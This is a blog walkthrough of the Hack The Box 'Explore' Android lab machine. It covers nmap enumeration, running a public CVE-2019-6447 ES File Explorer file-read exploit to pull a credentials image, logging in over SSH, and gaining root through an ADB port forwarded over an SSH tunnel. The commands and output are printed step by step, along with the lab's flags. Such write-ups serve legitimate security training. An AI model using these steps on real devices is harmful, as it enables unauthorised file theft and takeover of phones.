The Dark Tech

The Dark Tech

You are here: Home / HTB / Explore HTB Walkthrough

Explore HTB Walkthrough

By Leave a Comment

Enumeration

Nmap Scan

# Nmap 7.91 scan initiated Fri Oct 22 14:03:27 2021 as: nmap -A -sC -sV -p- -O -oN nmap 10.10.10.247
Nmap scan report for 10.10.10.247
Host is up (0.18s latency).
Not shown: 65531 closed ports
PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
Network Distance: 2 hops
Service Info: Device: phone

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   185.07 ms 10.10.14.1
2   185.28 ms 10.10.10.247

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 22 14:08:39 2021 -- 1 IP address (1 host up) scanned in 311.53 seconds

So here we have a ssh port running on 2222 a filtered ADB port on 5555 and two http ports on 42135 and 59777 so lets check the http first

port 42135 returns a error Not Found

while the 59777 returns the forbidden error

Foothold

So lets check for the ES file explorer vulnerability after searching on google for ES file explorer open port vulnerability you can see a exploitdb post on Arbitary File Read

https://www.exploit-db.com/exploits/50070

so just get that payload and save it locally

by listing for the pictures you can see a creds.jpg

└─# python3 exploit.py listPics 10.10.10.247 

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

So lets go ahead and download it

└─# python3 exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg                                  1 ⨯

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

[+] Downloading file...
[+] Done. Saved as `out.dat`.

User

Now the script will save the data in file out.dat so just rename it to creds.jpg

and here you can see the image with ssh credentials in it

kristi:[email protected]!

└─# ssh [email protected] -p 2222                                                           
Password authentication
Password: 
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
:/ $ whoami
u0_a76
2|:/ $ cd sdcard
:/sdcard $ ls
Alarms  DCIM     Movies Notifications Podcasts  backups   user.txt 
Android Download Music  Pictures      Ringtones dianxinos 
:/sdcard $ cat user.txt
f32017174c7c7e8f50c6da52891ae250

And here we got the User flag

Root

As we sow earlier there wa port 5555 filtered wich is basically used for adb in android so lets create a ssh tnnel to forward it to our machine

sh [email protected] -p 2222 -L 5555:127.0.0.1:5555   
Password authentication
Password: 
:/ $

This will create the ssh tunnel to forward 5555 port to our machine now lets connect using adb

adb connect 127.0.0.1:5555

after a successful connection you can see the device by doing

adb devices

now for interacting with shell use

└─# adb -s 127.0.0.1:5555 shell
x86_64:/ $ id                                                                                                      
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ su

:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
:/ # whoami
root
:/ # cat /data/root.txt
f04fc82b6d49b41c9b08982be59338c5
:/ #

Remember we used SU to switch to root from shell

Rooted..!!!

Reader Interactions

Leave a Reply

Your email address will not be published. Required fields are marked *